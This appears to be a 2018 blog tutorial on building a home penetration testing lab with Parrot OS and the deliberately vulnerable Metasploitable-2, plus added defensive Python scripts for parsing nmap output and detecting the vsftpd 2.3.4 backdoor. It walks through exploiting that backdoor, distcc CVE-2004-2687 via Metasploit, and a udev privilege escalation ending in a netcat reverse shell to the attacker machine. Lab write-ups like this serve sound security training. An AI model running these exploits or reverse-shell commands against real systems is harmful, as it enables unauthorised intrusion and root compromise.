Basic Penetration testing lab — 1

Sahil Ahamad
Sep 16, 2018 · 8 min read

I am setting up a new lab for myself and thought I would document the process, so anyone who wants to do the same can use this post as a reference. I am writing this one from scratch and will add more parts as I move forward.

Preface

  1. Downloading all the things.
  2. Creating Virtual machines
  3. Configuring Virtual machines
  4. Reconnaissance
  5. Exploiting Common vulnerabilities — Metasploitable-2
  6. Credits

1. Downloading all the Things.

VMware Fusion 10 — I like the paid version of VMware Fusion 10, but you can also use VirtualBox, which is FREE. I still highly recommend VMware Fusion 10.

Parrot OS — I have been using Kali Linux for a long time, but I wanted to try Parrot OS because many people recommended it.

https://metasploit.help.rapid7.com/docs/metasploitable-2

Metasploitable-2 — Metasploitable-2 is vulnerable by design; it is developed by Rapid7 for practicing against a vulnerable host. DO NOT expose this machine to any production or sensitive network.


2. Creating Virtual Machines.

Parrot OS

Click “Install from disc or image”, locate your ISO and accept the default configuration; you can choose the memory and disk size according to your needs.

Provide the location of the Parrot OS.

You can use “live mode” or install it. I preferred the installed version.

Metasploitable-2

The installation process is similar to Parrot OS.

You can set the memory and disk size according to your needs, but keep the host machine’s resources in mind when choosing custom values.


3. Configuring Virtual Machines

For a penetration testing lab it is important that the machines can reach each other on a local network. To do that, use the “Bridge Connection” in the network settings of both VMs. Keep in mind that a bridged adapter places the VM on the same LAN as your host; if the host sits on a shared or untrusted network, a host-only or internal network keeps Metasploitable-2 reachable from Parrot OS without exposing it to anyone else.

ParrotOS

Adjust the remaining settings according to your requirements.

Metasploitable-2


4. Reconnaissance

Start up both machines, Parrot OS and Metasploitable-2.

Metasploitable-2

Login with the following credentials.

Username: msfadmin
Password: msfadmin

Find the local IP address of Metasploitable-2 using

ifconfig

Metasploitable-2 local IP: 192.168.10.10

ParrotOS

Login with your credentials.

Default credentials for Parrot OS:

Username: user
Password: toor

Find the IP address of Parrot OS using the following command.

ifconfig

Parrot OS local IP: 192.168.10.5

Port scanning Metasploitable-2 using ParrotOS

nmap -A 192.168.10.10 -oX /home/ehsahil/Desktop/metasploit2-nmap-scan.xml

The output is in XML format; let's convert it into a more readable form.

To do this we will use a utility called “xsltproc”, which converts the XML into HTML (with no stylesheet argument, xsltproc uses the nmap.xsl stylesheet that the report itself references).

xsltproc /home/ehsahil/Desktop/metasploit2-nmap-scan.xml -o /home/ehsahil/Desktop/metasploit2-nmap-scan.html
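The HTML report is nice to look at, but for keeping an inventory of the lab (and diffing two scans after you change something) a small parser over the same XML is handier. The script below is an added example for this post, not code from the original article or from the nmap project; it reads the file written by `-oX` and returns one row per open port. `SAMPLE_XML` is a constructed, trimmed scan result for the Metasploitable-2 host above, and `parse_nmap_file` is a hypothetical helper name.

```python
"""Summarize an nmap -oX report into one row per open port.

Added example for this post; not code from the original article or from
the nmap project. It gives the same per-port view the xsltproc HTML report
does, in a form that is easy to grep or diff between two scans of the lab.
SAMPLE_XML is a constructed, trimmed scan of the Metasploitable-2 host.
"""
import xml.etree.ElementTree as ET

# Constructed sample: trimmed nmap -oX output with two open ports and one closed.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -A 192.168.10.10">
  <host>
    <status state="up"/>
    <address addr="192.168.10.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="closed"/>
        <service name="ssh"/>
      </port>
      <port protocol="tcp" portid="3632">
        <state state="open"/>
        <service name="distccd" product="distccd" version="v1"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return a list of dicts, one per open port, for every host in the scan."""
    root = ET.fromstring(xml_text)
    rows = []
    for host in root.findall("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.findall("ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # only open ports belong in the inventory
            svc = port.find("service")
            attr = svc.attrib if svc is not None else {}
            rows.append({
                "host": addr,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": attr.get("name", ""),
                "product": attr.get("product", ""),
                "version": attr.get("version", ""),
            })
    return sorted(rows, key=lambda r: (r["host"], r["port"]))


def parse_nmap_file(path):
    """Same as parse_nmap_xml, for a file written with nmap -oX (hypothetical helper)."""
    with open(path, encoding="utf-8") as fh:
        return parse_nmap_xml(fh.read())


def render_table(rows):
    """Render the rows as a fixed-width text table, header first."""
    lines = [f"{'HOST':<16}{'PORT':<10}{'SERVICE':<10}{'PRODUCT':<12}VERSION"]
    for r in rows:
        port = f"{r['port']}/{r['proto']}"
        lines.append(f"{r['host']:<16}{port:<10}{r['service']:<10}{r['product']:<12}{r['version']}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_table(parse_nmap_xml(SAMPLE_XML)))
```

Run it against a real scan with `parse_nmap_file("/home/ehsahil/Desktop/metasploit2-nmap-scan.xml")`; the rows from two scans can be compared directly to see which services appeared or disappeared after a change to the lab.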

5. Exploiting Common Vulnerabilities.

Metasploitable-2

1. Exploiting vsftpd 2.3.4

2. Exploiting distcc v1 — CVE-2004-2687


1. Exploiting vsftpd 2.3.4.

Aim: Exploit VSFTPD daemon and obtain root access.

Scanning port 21 using nmap.

nmap -sV -p 21 192.168.10.10

Port 21 is open and running vsftpd version 2.3.4.

Searching online for publicly available exploits for this particular version (search query: “vsftp 2.3.4 exploits”).

Exploiting manually.

ftp 192.168.10.10
username: ehsahil:)
Password: nothing, just press Enter

PS: the smiley :) at the end of the username is important; it is what triggers the backdoor.

Now we need to connect to port 6200, because the backdoor has opened a listener on that port.

nc -vvn 192.168.10.10 6200

Exploiting using Metasploit.

Start Metasploit using the msfconsole command.

msfconsole

Metasploit Commands.

search vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOST 192.168.10.10
exploit

Background: this specific version of vsftpd was infected with a backdoor by an intruder; the developers quickly responded by removing the backdoor from the code. Users who upgraded to this version were vulnerable to the issue.

The backdoor is triggered when a username containing :) (a smiley face) is sent during the FTP login handshake; the backdoor then sets up a bind shell listening on port 6200.
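Because the trigger is so specific, it is also easy to detect from the defender's side: a USER command whose argument contains `:)`, a 220 banner announcing vsftpd 2.3.4, or port 6200 suddenly listening on an FTP host. The script below is an added example for this post, not code from the original article or from vsftpd; the log line format (`<src> -> <dst>: <FTP command>`) and the sample lines are constructed for the example, so adapt `LINE_RE` to whatever your sensor actually emits.

```python
"""Flag the vsftpd 2.3.4 backdoor trigger in FTP control-channel logs.

Added example for this post; not code from the original article or from
vsftpd. The backdoor fires on a USER argument that contains ':' and ')',
so a log monitor or IDS rule can alert on exactly that, on the banner of
the affected version, and on the bind-shell port appearing as a listener.
The "<src> -> <dst>: <command>" format and the sample lines are constructed.
"""
import re

BACKDOOR_TRIGGER = ":)"   # character sequence the backdoor looks for in USER
BACKDOOR_PORT = 6200      # port the backdoor's bind shell listens on
VULNERABLE_BANNER = re.compile(r"vsftpd\s+2\.3\.4\b", re.IGNORECASE)

# One line per FTP command, in the constructed sensor format used here.
LINE_RE = re.compile(r"^(?P<src>\S+) -> (?P<dst>\S+): (?P<cmd>\S+)(?: (?P<arg>.*))?$")

SAMPLE_LINES = [  # constructed sample traffic from the lab
    "192.168.10.5 -> 192.168.10.10: USER msfadmin",
    "192.168.10.5 -> 192.168.10.10: PASS msfadmin",
    "192.168.10.5 -> 192.168.10.10: USER ehsahil:)",
    "192.168.10.5 -> 192.168.10.10: PASS ",
    "192.168.10.5 -> 192.168.10.10: USER anonymous",
    "not an ftp line at all",
]


def find_backdoor_attempts(lines):
    """Return one alert per USER command whose argument carries the trigger."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # unparseable line; a real sensor would count these
        if m.group("cmd").upper() != "USER":
            continue
        username = m.group("arg") or ""
        if BACKDOOR_TRIGGER in username:
            alerts.append({"src": m.group("src"), "dst": m.group("dst"), "username": username})
    return alerts


def is_vulnerable_banner(banner):
    """True for the 220 greeting of the affected version, e.g. '220 (vsFTPd 2.3.4)'."""
    return bool(VULNERABLE_BANNER.search(banner))


def unexpected_backdoor_listener(listening_ports):
    """True if the backdoor's bind-shell port shows up among a host's listeners."""
    return BACKDOOR_PORT in set(listening_ports)


if __name__ == "__main__":
    for a in find_backdoor_attempts(SAMPLE_LINES):
        print(f"ALERT backdoor trigger from {a['src']} to {a['dst']}: USER {a['username']!r}")
```

The banner check is the cheap inventory question (is the affected version still deployed anywhere?); the USER check is the live-traffic question (is someone poking it?); the listener check catches a successful trigger after the fact, which is useful because the bind shell on 6200 has nothing to do with the FTP log.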

Vulnerable Source code: http://pastebin.com/AetT9sS5

Detailed Source code review:


2. Exploiting Vulnerable DISTCC — CVE-2004-2687

Aim: Getting root access on the machine.

distcc v1 is a known vulnerable application running on Metasploitable-2. It is interesting because the exploit only gives us a normal user, so we have to escalate from that user to root using privilege escalation.

Searching online for distcc.

distcc is a tool for speeding up the compilation of source code by using distributed computing over a computer network. With the right configuration, distcc can dramatically reduce a project’s compilation time.

distcc is running on port 3632.

Running nmap against port 3632.

nmap -sV -p 3632 192.168.10.10

Searching for the public exploit for distccd v1

Vulnerable to: CVE-2004-2687

A public exploit is available: https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec

Exploiting using Metasploit

msfconsole

Metasploit commands.

search distcc
use exploit/unix/misc/distcc_exec
show options
set RHOST 192.168.10.10
exploit

Currently uid=1 (the daemon user) and we cannot cat /etc/shadow; this indicates that we do not have root privileges yet.

We need to leverage another vulnerability in the installed components. To do that, we apply the recon process to learn more about the system.

Listing all the shells available to us.

cat /etc/shells

GCC — Used for compiling exploits

which gcc

WGET — Used to download the exploit in the vulnerable machine

which wget

Let's see all the running processes.

ps aux

From the above processes we can move on to look for publicly available exploits. But as we are using Metasploitable-2, we already know the vulnerable component, so we will use that.

The vulnerable component is “udev”; let's grep for it in the running processes.

Searching for exploits on searchsploit

searchsploit udev

We are interested in the exploit for “local privilege Escalation(2) — /exploits/linux/local/8572.c”

cat /usr/share/exploitdb/exploits/linux/local/8572.c

Exploit usage.

Steps for escalating from daemon to root.

1. Starting the local Apache server (apache2)

service apache2 start

2. Copying the exploit into the Apache server’s public directory

Exploit directory: /usr/share/exploitdb/exploits/linux/local/

Apache server’s public directory: /var/www/html

sudo cp /usr/share/exploitdb/exploits/linux/local/8572.c /var/www/html/ehsahil.c

3. Downloading the exploit file onto the vulnerable machine using wget (Parrot OS IP: 192.168.10.5).

wget 192.168.10.5/ehsahil.c

Our exploit code “ehsahil.c” has been copied to the /tmp directory.

4. Creating a run file in the /tmp directory, required by the exploit.

touch run  # creating the run file required by the exploit
# shell script that gives us the reverse shell
echo '#!/bin/sh' > run
echo '/bin/netcat -e /bin/bash 192.168.10.5 5555' >> run

5. Compiling our exploit code.

gcc ehsahil.c -o ehsahil

6. Listening on port 5555 (on Parrot OS).

nc -lvnp 5555

7. Finding the PID of the udev Netlink socket.

cat /proc/net/netlink

PID of the udev Netlink socket = 2718

8. Giving execute permission to the compiled exploit.

chmod 755 ehsahil

9. Exploit.

./ehsahil <PID-of-udev-Netlink-socket>

./ehsahil 2718

Reverse shell obtained.
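Looking back at the chain, the recon steps (ps aux, which gcc, which wget) are exactly what a defender should be running too, because they list the conditions the escalation depended on: a compiler and a download tool on the target, distccd reachable from the network, and udevd running. The script below is an added example for this post, not code from the original article; it turns that command output into findings. The `ps aux` snapshot and tool paths are constructed so it runs offline; on a live host you would pass the real `ps aux` output together with `live_tool_paths()`. The exploit-db identifier 8572 and CVE-2004-2687 are the ones cited above, and `distccd --allow` is a real option; the rest of the messages are the example's own wording.

```python
"""Turn the post's recon output into defender findings.

Added example for this post; not code from the original article. The
functions take `ps aux` text and a tool->path mapping so they can be
exercised on the constructed snapshot below; on a live host, feed them the
real `ps aux` output and live_tool_paths(). The process list is constructed.
"""
import shutil

# Constructed `ps aux` snapshot in the shape of a Metasploitable-2 host.
SAMPLE_PS_AUX = """USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.1   2844  1692 ?        Ss   10:02   0:01 /sbin/init
root      2717  0.0  0.0   2216   660 ?        S<s  10:02   0:00 /sbin/udevd --daemon
daemon    4421  0.0  0.1   2964   828 ?        Ss   10:03   0:00 /usr/bin/distccd --daemon --allow 0.0.0.0/0
msfadmin  4502  0.0  0.3   5876  3180 pts/0    Ss   10:04   0:00 -bash
"""

TOOLS_OF_INTEREST = ("gcc", "cc", "wget", "curl", "nc", "netcat", "ncat")


def running_processes(ps_text):
    """Parse `ps aux` output into (user, pid, command) tuples."""
    procs = []
    for line in ps_text.splitlines()[1:]:   # skip the header row
        parts = line.split(None, 10)        # COMMAND may itself contain spaces
        if len(parts) < 11:
            continue
        procs.append((parts[0], int(parts[1]), parts[10]))
    return procs


def live_tool_paths(names=TOOLS_OF_INTEREST):
    """Resolve each tool on the host this runs on (the `which` step of the post)."""
    return {n: shutil.which(n) for n in names}


def audit_host(ps_text, tool_paths):
    """Return findings for the conditions the post's escalation chain relied on."""
    findings = []
    for user, pid, cmd in running_processes(ps_text):
        exe = cmd.split()[0].rsplit("/", 1)[-1]   # basename of the executable
        if exe == "distccd":
            msg = (f"distccd (pid {pid}, user {user}) accepts remote compile jobs; "
                   "restrict clients with --allow or firewall port 3632 (CVE-2004-2687)")
            findings.append({"id": "distccd-running", "pid": pid, "msg": msg})
        elif exe == "udevd":
            msg = (f"udevd (pid {pid}) is running; check its version against the "
                   "local privilege escalation in exploit-db 8572")
            findings.append({"id": "udevd-running", "pid": pid, "msg": msg})
    for tool, path in tool_paths.items():
        if not path:
            continue  # tool not installed: nothing to report
        if tool in ("gcc", "cc"):
            fid, why = "compiler-present", "lets an intruder build exploits on the host"
        elif tool in ("wget", "curl"):
            fid, why = "downloader-present", "lets an intruder fetch tooling onto the host"
        else:
            fid, why = "netcat-present", "gives an intruder an easy reverse shell"
        findings.append({"id": fid, "pid": None, "msg": f"{tool} at {path} {why}"})
    return findings


if __name__ == "__main__":
    for f in audit_host(SAMPLE_PS_AUX, live_tool_paths()):
        print(f"[{f['id']}] {f['msg']}")
```

Each finding maps to a mitigation the post makes obvious in hindsight: remove or restrict build and download tools on servers that do not need them, limit distccd to known build clients (or do not expose it at all), and keep udev patched. Run on a hardened host the script should return an empty list.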


I will post more common Metasploitable-2 exploits as I practice them.

Credits

RWB NetSec

Feedback? hit me on twitter @ehsahil


Until Next time.

Sahil Ahamad

Written by

Security Engineer @zomato | Information Security Researcher | Bug Bounty Hunter | https://hackerone.com/ehsahil